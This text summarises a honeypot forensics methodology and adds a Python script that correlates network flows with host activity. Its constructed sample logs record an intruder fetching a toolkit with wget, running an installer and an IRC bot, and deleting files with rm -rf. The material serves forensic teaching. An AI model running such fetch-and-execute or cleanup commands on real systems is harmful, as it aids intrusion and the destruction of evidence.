Honeypot forensics

The deployment of low-interaction honeypots, used mainly as deception tools, has become increasingly common. Another interesting but more resource- and time-consuming playground is offered by high-interaction honeypots, where a blackhat can connect to the system and download, install and execute his own tools in a less constrained environment. Once caught in the honeypot, the blackhat leaves many fingerprints behind: network activity (information-gathering scans, IRC chats, mail, etc.) and system activity (what he did on the system, which tools he used, etc.). The aim of honeypot forensics is to identify these fingerprints as part of the evidence-gathering process. We present a methodology that helps the analyst achieve this goal. The first step is to analyze the honeypot's ingress and egress network traffic. The second is to examine the actions performed by the blackhat and the tools he used on the honeypot. The final step is to correlate these data: network and system events are joined to identify common events or patterns, and also to highlight unexplained items so the analyst can focus on them.
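The correlation step described above can be illustrated with a small timeline-join. The following Python script is an added example written for this page, not code from the paper: it assumes two simplified, constructed logs (one line per network flow summary, one line per system event, both with an ISO-8601 timestamp), joins them within a tolerance window, and reports which system actions have no network counterpart and which flows have no matching system action, which are exactly the unexplained items the methodology tells the analyst to focus on.

```python
"""Correlate honeypot network flows with system activity by time window.

Added example: the log formats below are simplified assumptions, and the
records themselves are constructed sample data, not real honeypot captures.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime

# Constructed ingress/egress flow summaries (timestamp, direction, peer, port, note).
NETWORK_LOG = """\
2024-05-01T10:00:05Z ingress 203.0.113.7 22 ssh-login
2024-05-01T10:00:40Z egress 198.51.100.9 80 http-get /tools/x.tgz
2024-05-01T10:02:10Z egress 198.51.100.20 6667 irc-join #chan
2024-05-01T10:03:30Z ingress 203.0.113.7 22 ssh-session
"""

# Constructed system activity, e.g. from a shell-history or syscall monitor.
SYSTEM_LOG = """\
2024-05-01T10:00:06Z uid=0 login from pts/0
2024-05-01T10:00:42Z exec wget http://198.51.100.9/tools/x.tgz
2024-05-01T10:00:50Z exec tar xzf x.tgz
2024-05-01T10:01:05Z exec ./x/install.sh
2024-05-01T10:02:11Z exec ./x/bot
2024-05-01T10:05:00Z exec rm -rf x x.tgz
"""


@dataclass(frozen=True)
class Event:
    ts: datetime
    source: str  # "net" or "sys"
    text: str


def parse_log(raw: str, source: str) -> list[Event]:
    """Turn '<timestamp> <rest of line>' records into sorted Event objects."""
    events = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        stamp, _, rest = line.partition(" ")
        ts = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")
        events.append(Event(ts, source, rest))
    return sorted(events, key=lambda e: e.ts)


def correlate(net: list[Event], system: list[Event], window_s: int = 5):
    """Pair each network event with the closest unused system event within
    window_s seconds. Returns (matched pairs, unexplained network events,
    unexplained system events)."""
    used: set[Event] = set()
    matched: list[tuple[Event, Event]] = []
    unexplained_net: list[Event] = []

    def gap(a: Event, b: Event) -> float:
        return abs((a.ts - b.ts).total_seconds())

    for n in net:
        candidates = [s for s in system if s not in used and gap(n, s) <= window_s]
        if not candidates:
            unexplained_net.append(n)
            continue
        best = min(candidates, key=lambda s: gap(n, s))
        used.add(best)
        matched.append((n, best))

    unexplained_sys = [s for s in system if s not in used]
    return matched, unexplained_net, unexplained_sys


def run_example():
    """Correlate the constructed logs and return the three result lists."""
    net = parse_log(NETWORK_LOG, "net")
    system = parse_log(SYSTEM_LOG, "sys")
    return correlate(net, system)


if __name__ == "__main__":
    matched, unexplained_net, unexplained_sys = run_example()
    print("Matched (network <-> system):")
    for n, s in matched:
        print(f"  {n.ts:%H:%M:%S} {n.text}  <->  {s.ts:%H:%M:%S} {s.text}")
    print("Network events with no system counterpart:")
    for n in unexplained_net:
        print(f"  {n.ts:%H:%M:%S} {n.text}")
    print("System events with no network counterpart (local-only actions):")
    for s in unexplained_sys:
        print(f"  {s.ts:%H:%M:%S} {s.text}")
```

On the constructed data, the SSH login, the download and the IRC join each pair with a system action a second or two later, while the unpacking, the installer and the final cleanup (`rm -rf`) have no network signature at all. That last group is the point of the correlation step: purely local actions, especially cleanup, are invisible to network monitoring and would be missed without the host-side evidence. The five-second window is a tuning knob; clock skew between sensor and honeypot should be measured and the window widened accordingly.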